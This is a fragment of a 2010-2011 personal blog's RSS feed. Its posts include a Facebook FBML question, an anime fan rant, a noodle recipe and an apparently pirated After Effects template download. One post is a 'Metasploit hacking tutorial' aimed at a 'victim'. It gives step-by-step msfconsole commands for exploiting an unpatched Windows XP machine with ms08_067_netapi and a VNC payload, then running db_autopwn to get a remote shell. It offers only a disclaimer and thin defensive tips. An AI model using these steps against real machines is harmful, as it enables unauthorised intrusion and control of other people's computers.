&lt;a href="http://feedads.g.doubleclick.net/~a/KEXaLLhOgV-GJfZ-lp7rSJgsJh0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/KEXaLLhOgV-GJfZ-lp7rSJgsJh0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/QcCKVznLKOc" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/QcCKVznLKOc/norton-ghost-150035659-new-antivirus.html</link><author>noreply@blogger.com (ArtistAshish)</author><thr:total>0</thr:total><feedburner:origLink>http://www.ashisharena.com/2011/02/norton-ghost-150035659-new-antivirus.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-3843443505697915209</guid><pubDate>Tue, 22 Feb 2011 09:55:00 +0000</pubDate><atom:updated>2011-02-22T01:56:08.839-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">facebook</category><category domain="http://www.blogger.com/atom/ns#">changes</category><category domain="http://www.blogger.com/atom/ns#">fbml</category><category domain="http://www.blogger.com/atom/ns#">source</category><category domain="http://www.blogger.com/atom/ns#">trial</category><category domain="http://www.blogger.com/atom/ns#">iframe</category><category domain="http://www.blogger.com/atom/ns#">page</category><category domain="http://www.blogger.com/atom/ns#">New</category><category domain="http://www.blogger.com/atom/ns#">fan</category><category domain="http://www.blogger.com/atom/ns#">format</category><category domain="http://www.blogger.com/atom/ns#">amazing</category><category domain="http://www.blogger.com/atom/ns#">code</category><category domain="http://www.blogger.com/atom/ns#">coding</category><title>Learning new updates from Facebook: No FBML soon</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Hi guys.&lt;br /&gt;&lt;br /&gt;So we all know that Facebook recently announced that from March 11, 2011, the Static FBML application &lt;b&gt;will no longer be available&lt;/b&gt; to be added to Pages and that no new FBML applications can be created after that date.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://t1.gstatic.com/images?q=tbn:ANd9GcTPYkiJ2zyIWSbbqTVGnHsp4iFOVJt4XTmh8xGIViiMyVgiY_FA" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://t1.gstatic.com/images?q=tbn:ANd9GcTPYkiJ2zyIWSbbqTVGnHsp4iFOVJt4XTmh8xGIViiMyVgiY_FA" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;The  good news is they are allowing i-frames, this application allows you to  add "external" content on your facebook page without any limitations  which were set by FBML. Now you have no limitations and &lt;b&gt;use full support of HTML, CSS, and JavaScript&lt;/b&gt; like any other Web page does.&lt;br /&gt;&lt;br /&gt;This is all we need to do as told be facebook:&lt;br /&gt;1) Upload all your files on an external server (FTP)&lt;br /&gt;2)  Installing the facebook developer application at  facebook(dot)com/developers (with this, you can create your own tab ie.,  an application which gets "added" to any of the page you admin using  HTML, CSS and JAVA and not FBML)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;I know about step 2, and  have no questions as of now. But I have a question about step 1 as read  above. What does it mean by uploading on some server? Does it mean we  can upload our files on some file hosting website? What's the best way  to do step 1? &lt;br /&gt;&lt;br /&gt;Also, share your new techniques/creativity of  changing your pages with full HTML/CSS support. I need to design a tab  for my page which must look just like a website (with menu options),  using this NEW update from facebook. Let's share our work.&lt;br /&gt;&lt;br /&gt;Thanks. :) &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-3843443505697915209?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/lvkJj3S5IHLSHXbpxMmhpWtnCP0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/lvkJj3S5IHLSHXbpxMmhpWtnCP0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/lvkJj3S5IHLSHXbpxMmhpWtnCP0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/lvkJj3S5IHLSHXbpxMmhpWtnCP0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/PqKPxmnfFTg" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/PqKPxmnfFTg/learning-new-updates-from-facebook-no.html</link><author>noreply@blogger.com (ArtistAshish)</author><thr:total>0</thr:total><feedburner:origLink>http://www.ashisharena.com/2011/02/learning-new-updates-from-facebook-no.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-7501057052082053285</guid><pubDate>Tue, 01 Feb 2011 15:02:00 +0000</pubDate><atom:updated>2011-02-01T07:02:01.217-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">sasori</category><category domain="http://www.blogger.com/atom/ns#">sand</category><category domain="http://www.blogger.com/atom/ns#">god</category><category domain="http://www.blogger.com/atom/ns#">puppet</category><category domain="http://www.blogger.com/atom/ns#">powers</category><category domain="http://www.blogger.com/atom/ns#">strong</category><category domain="http://www.blogger.com/atom/ns#">revieled</category><category domain="http://www.blogger.com/atom/ns#">secret</category><category domain="http://www.blogger.com/atom/ns#">master</category><category domain="http://www.blogger.com/atom/ns#">ninja</category><category domain="http://www.blogger.com/atom/ns#">naruto</category><category domain="http://www.blogger.com/atom/ns#">amazing</category><category domain="http://www.blogger.com/atom/ns#">death</category><category domain="http://www.blogger.com/atom/ns#">wiki</category><title>the pride of all mighty GOD SASORI sama</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Ok this is for those who doubt the awesomeness of sasori sama.&lt;br /&gt;&lt;br /&gt;I  will not go in the details of his powers, that's what they have WIKI  for. I will present some of the other things about him that are so huge,  so awesome that it is too much even for wiki.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://images.wikia.com/naruto/images/a/a5/Sasori%27s_Pupet_Body.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://images.wikia.com/naruto/images/a/a5/Sasori%27s_Pupet_Body.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;1. He is GOD.&lt;br /&gt;&lt;br /&gt;2.  HE had 298 human puppets.&lt;br /&gt;&lt;br /&gt;No seriously, if all u people have  deduced that sasori is 1 of the weakest on the basis of his fighting  with the old hag, u are sorely mistaken. &lt;br /&gt;&lt;br /&gt;He had 298 freakin'  puppets. Chiyo and sakura had it only in 1 that was kazekage. Now sasori  could have unleashed any of his other 297 puppets then but he didn't.  Can any1 say why ? He just wanted to show his granny how awesome he had  became now. He wanted to show his granny only the best works of him and  that's why.The love blinded him&lt;br /&gt;&lt;br /&gt;Plus he had that freakin' poison  needles. &lt;br /&gt;&lt;br /&gt;&lt;i&gt;1 canister in the air, &lt;br /&gt;300 needles in the  atmosphere,&lt;br /&gt;If u got touched even by a 1,&lt;br /&gt;u only got 3 days to  live hon, &lt;br /&gt;u are struck with a poison with no remedy..,&lt;br /&gt;U just  create a lot of pity,&lt;br /&gt;U are paralyzed for the rest 3 days, just for  your know,&lt;br /&gt;Fuck u dude u are just nailed for the good yo !!!&lt;/i&gt; &lt;br /&gt;&lt;br /&gt;There.  I depicted sasori sama's awesomeness right in front of u and that too  rhymed while doing it. Man, I am AWESOME. &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-7501057052082053285?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/jFCGlCQBBIdqC7ez9s4fcOi_-pQ/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/jFCGlCQBBIdqC7ez9s4fcOi_-pQ/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/jFCGlCQBBIdqC7ez9s4fcOi_-pQ/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/jFCGlCQBBIdqC7ez9s4fcOi_-pQ/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/P35CnSgYqII" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/P35CnSgYqII/pride-of-all-mighty-god-sasori-sama.html</link><author>noreply@blogger.com (ArtistAshish)</author><thr:total>0</thr:total><feedburner:origLink>http://www.ashisharena.com/2011/02/pride-of-all-mighty-god-sasori-sama.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-2512002122238358779</guid><pubDate>Tue, 01 Feb 2011 13:20:00 +0000</pubDate><atom:updated>2011-02-02T00:39:29.655-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">open</category><category domain="http://www.blogger.com/atom/ns#">website</category><category domain="http://www.blogger.com/atom/ns#">cpanel</category><category domain="http://www.blogger.com/atom/ns#">address</category><category domain="http://www.blogger.com/atom/ns#">password. username</category><category domain="http://www.blogger.com/atom/ns#">ip</category><category domain="http://www.blogger.com/atom/ns#">break</category><category domain="http://www.blogger.com/atom/ns#">Port</category><category domain="http://www.blogger.com/atom/ns#">metaspoilt</category><category domain="http://www.blogger.com/atom/ns#">tutorial</category><category domain="http://www.blogger.com/atom/ns#">account</category><category domain="http://www.blogger.com/atom/ns#">hack</category><category domain="http://www.blogger.com/atom/ns#">hacking</category><title>UNDERSTANDING METASPOILT HACKING- tutorial</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;NOTE: I'm not responsible for anything you do with this info! &lt;br /&gt;&lt;br /&gt;I'll not go in deep to make this paper boring :)&lt;br /&gt;&lt;br /&gt;Okay so let's begin!&lt;br /&gt;&lt;br /&gt;First of all, you would be thinking what is Metasploit?&lt;br /&gt;Metasploit is a framework which allow us to penetest the remote machine to see if its vulnerable to any exploit and if yes, then we can control that remote machine from our own computer.&lt;br /&gt;&lt;br /&gt;How it works?&lt;br /&gt;Metasploit works on 3 things -&lt;br /&gt;&lt;br /&gt;1. Vulneribility&lt;br /&gt;2. Exploits&lt;br /&gt;3. Payloads&lt;br /&gt;&lt;br /&gt;Okay, let me give you a real life example. &lt;br /&gt;&lt;br /&gt;Just imagine there's a house which is locked, and a theif comes and if he tries 7-8 combinations of keys then he is able to crack that lock, and get into the house.&lt;br /&gt;&lt;br /&gt;=&amp;gt;&amp;gt; Now this thing is called vulneribilty according to Metasploit.&lt;br /&gt;&lt;br /&gt;Now the theif tries some combinations of keys and he is able to get into the house successfully. &lt;br /&gt;&lt;br /&gt;=&amp;gt;&amp;gt; Now this is called exploit according to Metasploit. &lt;br /&gt;&lt;br /&gt;Now it depends on the theif what he wanna do with the house, he can whether steal jwellery, money and any other item present in house. Basically the things that he do after getting in the house.&lt;br /&gt;&lt;br /&gt;=&amp;gt;&amp;gt; Now this is called payload according to Metasploit.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Okay now let me explain you this in a hacker's language. &lt;br /&gt;&lt;br /&gt;Just imagine you have found a vulnerable computer with XP sp2 as operating system. And there's a exploit available from XP sp2 already.&lt;br /&gt;&lt;br /&gt;=&amp;gt;&amp;gt; So this is called vulneribilty.&lt;br /&gt;&lt;br /&gt;Now you apply the exploit by providing victim's IP address and any open port.&lt;br /&gt;&lt;br /&gt;=&amp;gt;&amp;gt; This is called exploit.&lt;br /&gt;&lt;br /&gt;Now you need to send payload in his computer, there are many payloads available in Metasploit from which you can get a shell in victim's pc, capture his keystrokes, control his PC through remote desktop, upload and execute a .EXE file, etc many other things. &lt;br /&gt;&lt;br /&gt;=&amp;gt;&amp;gt; This is known as payload.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now the question is how to use Metasploit? &lt;br /&gt;&lt;br /&gt;Hmm, Metasploit is available in two platforms - console (cmd) and GUI (graphical user interface). &lt;br /&gt;&lt;br /&gt;Console is the best, so we'll go on it. &lt;br /&gt;&lt;br /&gt;Metasploit has different commands for different things.&lt;br /&gt;&lt;br /&gt;If you want to see exploit simply type = show exploits.&lt;br /&gt;If you want to see payload, type = show payloads&lt;br /&gt;After setting all options now type = exploit&lt;br /&gt;&lt;br /&gt;Okay so now basics are cleared that how Metasploit works. Now lets move on to some higher level, which is hacking ;)&lt;br /&gt;&lt;br /&gt;Suppose you have a victim who is running XP SP2 unpatched version, and you have his IP.&lt;br /&gt;&lt;br /&gt;Now you need to open msfconsole. &lt;br /&gt;&lt;br /&gt;Wait, let it load, it'll take sometime as it has more than 600 exploits and 200 payloads.&lt;br /&gt;&lt;br /&gt;Now when it is loaded type cmd = db_driver sqlite3&lt;br /&gt;&lt;br /&gt;=&amp;gt;&amp;gt; It'll load the database driver.&lt;br /&gt;&lt;br /&gt;Now type = db_create&lt;br /&gt;&lt;br /&gt;=&amp;gt;&amp;gt; It'll create a new database.&lt;br /&gt;&lt;br /&gt;Type = show exploits&lt;br /&gt;&lt;br /&gt;=&amp;gt;&amp;gt; It'll get the list of all exploits currently present in Metasploit database.&lt;br /&gt;&lt;br /&gt;Now type = use [exploit name] (we'll use windows/smb/ms08_067_netapi exploits, as we are attacking a XP SP2 machine)&lt;br /&gt;&lt;br /&gt;So type = use windows/smb/ms08_067_netapi&lt;br /&gt;&lt;br /&gt;=&amp;gt;&amp;gt; It'll load the exploit. Usually all exploits are to be executed on a third party software's security hole. But this exploit is found in the windows XP's system file.&lt;br /&gt;&lt;br /&gt;Now you need to select payload, type&amp;nbsp; = show payloads &lt;br /&gt;&lt;br /&gt;=&amp;gt;&amp;gt; It'll show you all payloads currently in the database, now we'll use vncinject payload (payload cmd = set PAYLOAD [payload name].&lt;br /&gt;&lt;br /&gt;So type = set PAYLOAD windows/vncinject/bind_tcp&lt;br /&gt;&lt;br /&gt;Now type = show options&lt;br /&gt;&lt;br /&gt;=&amp;gt;&amp;gt; It'll sort out all the options that you need to fill now.&lt;br /&gt;&lt;br /&gt;To fill the option the cmd is = set [option name] [your selection(answer)]&lt;br /&gt;&lt;br /&gt;You need to fill some options like RHOST, RPORT, LPORT, LHOST, etc. Fill them as I said.&lt;br /&gt;&lt;br /&gt;RHOST (remote host) = Remote machine's IP (victim's IP) &lt;br /&gt;&lt;br /&gt;To see victim's open port use Nmap to scan his IP and get the open ports. Now when you are done fill all options.&lt;br /&gt;&lt;br /&gt;And at last type = exploit&lt;br /&gt;&lt;br /&gt;=&amp;gt;&amp;gt; Bangggg! You are done! Now a new windows should be opened, it's like you are in the PC, you can control the whole PC :)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;In this paper I'll explain:&lt;br /&gt;&lt;br /&gt;1. How does the exploits work.&lt;br /&gt;2. How to prevent your computer from being exploited.&lt;br /&gt;3. How to use autopown function in Metasploit to hack a remote machine.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;How does the exploits work?&lt;br /&gt;&lt;br /&gt;Exploits are made by finding a security hole in a software. And then we can send our payload to perform different actions. &lt;br /&gt;Exploit writers needs to have very deep knowledge of the software/program in which they are trying to find a security hole to prepare/write an exploit. Usually all exploits are to be executed on a third party software, as the security holes are found in those softwares. But there are also some exploits available to directly attack OS, means the security holes are found in a windows file. &lt;br /&gt;&lt;br /&gt;How to prevent your computer from being exploited.&lt;br /&gt;&lt;br /&gt;Almost 60% of operating systems are patched till date. And there's no exploit for Win 7 currently. Some anti-viruses can also block some hackers from exploiting your computer.&lt;br /&gt;Though there are some things you can do to prevent your computer from being exploited:&lt;br /&gt;&lt;br /&gt;1. Never run any unwanted link.&lt;br /&gt;2. Never turn your AV off even when someone tells you to do so.&lt;br /&gt;3. Don't share your IP with anyone.&lt;br /&gt;4. If you know that the hacker has your IP address and if you have a dynamic IP, simply re-connect your internet connection.&lt;br /&gt;&lt;br /&gt;These are some steps you can follow to prevent your computer from being exploited.&lt;br /&gt;&lt;br /&gt;_________________________________&lt;br /&gt;&lt;br /&gt;Now, I'll explain you how to hack a remote computer just by its IP address. By launching exploit on a third party software in victim's computer.&lt;br /&gt;&lt;br /&gt;It&amp;nbsp; works 50% times. &lt;br /&gt;&lt;br /&gt;Download latest Metasploit framework from its official site - www.metasploit.com&lt;br /&gt;Okay now when you downloaded it, now install, and between installation it'll ask you if you want to install Nmap also, say YES.&lt;br /&gt;&lt;br /&gt;Nmap is a software which allows you to check the open ports, OS, sevices, etc of a remote computer just with its IP.&lt;br /&gt;&lt;br /&gt;Now launch msfconsole. &lt;br /&gt;&lt;br /&gt;It'll take sometime as it has more than 600 exploits and 200 payloads.&lt;br /&gt;&lt;br /&gt;Type = db_driver sqlite3&lt;br /&gt;&lt;br /&gt;=&amp;gt;&amp;gt; It'll enable the database driver.&lt;br /&gt;&lt;br /&gt;Now type = db_create&lt;br /&gt;&lt;br /&gt;=&amp;gt;&amp;gt; It'll create a database.&lt;br /&gt;&lt;br /&gt;Type = nmap&lt;br /&gt;&lt;br /&gt;=&amp;gt;&amp;gt; It'll load the Nmap up.&lt;br /&gt;&lt;br /&gt;Now type = db_nmap -sT -sV [victim's ip address]&lt;br /&gt;&lt;br /&gt;=&amp;gt;&amp;gt; It'll show the open ports of victim's machine.&lt;br /&gt;&lt;br /&gt;Now finally type = db_autopwn -p -t -e&lt;br /&gt;&lt;br /&gt;=&amp;gt;&amp;gt; Now it'll try different-different exploits on the remote machine automatically, and if it found the exploit working, it'll give you a CMD shell for the remote PC! &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Voila! Now you can do anything with his PC!&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-&lt;br /&gt;&lt;br /&gt;Now the white papers are over for Metasploit, now only tutorials will come &amp;gt;:D&amp;lt; &lt;br /&gt;&lt;br /&gt;Again -&amp;nbsp; I'm not responsible for anything you do with this info! &lt;br /&gt;&lt;br /&gt;If you have any questions, I'll try to best to help you! &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-2512002122238358779?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/wRcRxF8KUkbOnWGHGnpZnga3fAI/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/wRcRxF8KUkbOnWGHGnpZnga3fAI/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/wRcRxF8KUkbOnWGHGnpZnga3fAI/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/wRcRxF8KUkbOnWGHGnpZnga3fAI/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/Bpos6wzePEE" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/Bpos6wzePEE/understanding-metaspoilt-hacking.html</link><author>noreply@blogger.com (ArtistAshish)</author><thr:total>0</thr:total><feedburner:origLink>http://www.ashisharena.com/2011/02/understanding-metaspoilt-hacking.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-7115604185017723264</guid><pubDate>Tue, 04 Jan 2011 08:49:00 +0000</pubDate><atom:updated>2011-01-04T00:49:26.846-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">noodles</category><category domain="http://www.blogger.com/atom/ns#">vegetables</category><category domain="http://www.blogger.com/atom/ns#">process</category><category domain="http://www.blogger.com/atom/ns#">cookie</category><category domain="http://www.blogger.com/atom/ns#">ingredients</category><category domain="http://www.blogger.com/atom/ns#">tastemaker</category><category domain="http://www.blogger.com/atom/ns#">soupy</category><category domain="http://www.blogger.com/atom/ns#">cooking</category><category domain="http://www.blogger.com/atom/ns#">recipe</category><category domain="http://www.blogger.com/atom/ns#">tangy</category><category domain="http://www.blogger.com/atom/ns#">snack</category><category domain="http://www.blogger.com/atom/ns#">ashish</category><category domain="http://www.blogger.com/atom/ns#">maggi</category><title>Tango Soupy Noodles by Ashish</title><description>Ultimate Damn Easy Noodles Ideal for a small Quick Snack. &lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_giHdRMRe1vc/TSLRvVixTfI/AAAAAAAAA2g/lHKy9xIvB18/s1600/DSC00637.JPG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="150" src="http://3.bp.blogspot.com/_giHdRMRe1vc/TSLRvVixTfI/AAAAAAAAA2g/lHKy9xIvB18/s200/DSC00637.JPG" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;u&gt;&lt;b&gt;INGREDIENTS:&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Maggi Noodles ( 1 pack )&lt;/li&gt;&lt;li&gt;Maggi Tomato Soup Powder ( 1 Pack )&lt;/li&gt;&lt;li&gt;Water (300ml)&lt;/li&gt;&lt;li&gt;Oil (1 tablespoon)&lt;/li&gt;&lt;li&gt;Black Pepper&lt;/li&gt;&lt;/ul&gt;&lt;u&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;&lt;u&gt;&lt;b&gt;PROCEDURE:&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;ol style="text-align: left;"&gt;&lt;a href="http://www.blogger.com/post-edit.g?blogID=6804681555637047946&amp;amp;postID=3092056468646015270" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;script type="text/javascript"&gt;    hopfeed_affiliate='ashishshum';    hopfeed_affiliate_tid='';    hopfeed_cellpadding='5';    hopfeed_font='Verdana, Arial, Helvetica, Sans Serif';    hopfeed_font_size='9pt';    hopfeed_font_color='#000000';    hopfeed_tab1_title='Top Products';    hopfeed_tab2_title='Indian Food';    hopfeed_tab3_title='Cooking';    hopfeed_tab1_keywords='Top, cooking, cook, garnish';    hopfeed_tab2_keywords='indian, food, cooking, masala';    hopfeed_tab3_keywords='cook, international, cousines';    hopfeed_template_name='DEFAULT';    hopfeed_active_tab_color='#11527B';    hopfeed_inactive_tab_color='#D1DCEE';    hopfeed_active_tab_font_color='#FFFFFF';    hopfeed_inactive_tab_font_color='#000000';    hopfeed_hover_color='#D1DCEE';    hopfeed_border_color='#11527B';    hopfeed_align='left';    hopfeed_width='300';    hopfeed_rows='5';    hopfeed_fill_slots='true';    hopfeed_link_target='_blank';    hopfeed_path='http://ashishshum.hopfeed.com';&lt;/script&gt; &lt;script src="http://ashishshum.hopfeed.com/script/hopfeed_widget.js" type="text/javascript"&gt;&lt;/script&gt;  &lt;/a&gt;&lt;li&gt;Take a Pan. Add Oil and Water in it.&lt;/li&gt;&lt;li&gt;Then Add MAGGI Soup Powder in it. Mix it well and avoid formation of Lumps.&lt;/li&gt;&lt;li&gt;Add Maggi Noodles and Bring it to Boil.&lt;/li&gt;&lt;li&gt;Slow Down the Flame and Add Maggi Tastemaker.&lt;/li&gt;&lt;li&gt;Cover it for 5-6 minutes.&lt;/li&gt;&lt;li&gt;Turn off the Flame and keep it Covered for 5 minutes&lt;/li&gt;&lt;li&gt;Enjoy with Coriander Leaves.&lt;/li&gt;&lt;/ol&gt;&lt;b&gt;TIPS:&lt;/b&gt; Add Veggies like Spring Onion, Capsicum to make it taste Awesome...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-7115604185017723264?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/bX9Ux5zLTyWEMxp187OvUGnnWVQ/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/bX9Ux5zLTyWEMxp187OvUGnnWVQ/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/bX9Ux5zLTyWEMxp187OvUGnnWVQ/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/bX9Ux5zLTyWEMxp187OvUGnnWVQ/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/GkV6CvkepWE" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/GkV6CvkepWE/tango-soupy-noodles-by-ashish.html</link><author>noreply@blogger.com (ArtistAshish)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_giHdRMRe1vc/TSLRvVixTfI/AAAAAAAAA2g/lHKy9xIvB18/s72-c/DSC00637.JPG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ashisharena.com/2011/01/tango-soupy-noodles-by-ashish.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-6937016668811965577</guid><pubDate>Fri, 31 Dec 2010 10:13:00 +0000</pubDate><atom:updated>2011-01-17T11:19:08.189-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Editable</category><category domain="http://www.blogger.com/atom/ns#">more</category><category domain="http://www.blogger.com/atom/ns#">Template</category><category domain="http://www.blogger.com/atom/ns#">Easy</category><category domain="http://www.blogger.com/atom/ns#">Project</category><category domain="http://www.blogger.com/atom/ns#">Corporate</category><category domain="http://www.blogger.com/atom/ns#">Portrait</category><category domain="http://www.blogger.com/atom/ns#">File</category><category domain="http://www.blogger.com/atom/ns#">amazing</category><category domain="http://www.blogger.com/atom/ns#">After Effects</category><category domain="http://www.blogger.com/atom/ns#">VIDEOHIVE</category><category domain="http://www.blogger.com/atom/ns#">revostock</category><category domain="http://www.blogger.com/atom/ns#">66393</category><category domain="http://www.blogger.com/atom/ns#">Gallery</category><title>VIDEOHIVE After Effects Project File - Corporate Portrait Gallery - 66393 - DOWNLOAD</title><description>&lt;div style="text-align: center;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;Preview Here...&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://videohive.net/item/-corporate-portrait-gallery/66393"&gt;&lt;b&gt;http://videohive.net/item/-corporate-portrait-gallery/66393&lt;/b&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;object height="340" width="560"&gt;&lt;param name="movie" value="http://www.youtube.com/v/Rk0k1wmuLdM?fs=1&amp;amp;hl=en_US&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/Rk0k1wmuLdM?fs=1&amp;amp;hl=en_US&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="560" height="340"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="color: #741b47; text-align: center;"&gt;&lt;u&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;To Download:&lt;/b&gt;&lt;/span&gt;&lt;/u&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: #274e13; font-family: &amp;quot;Helvetica Neue&amp;quot;,Arial,Helvetica,sans-serif; text-align: center;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;a href="http://lnkgt.com/5vc"&gt;DEPOSITFILES LINK&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: #274e13; font-family: &amp;quot;Helvetica Neue&amp;quot;,Arial,Helvetica,sans-serif; text-align: center;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;a href="http://www.blogger.com/goog_507869197"&gt; &lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="color: #274e13; font-family: &amp;quot;Helvetica Neue&amp;quot;,Arial,Helvetica,sans-serif; text-align: 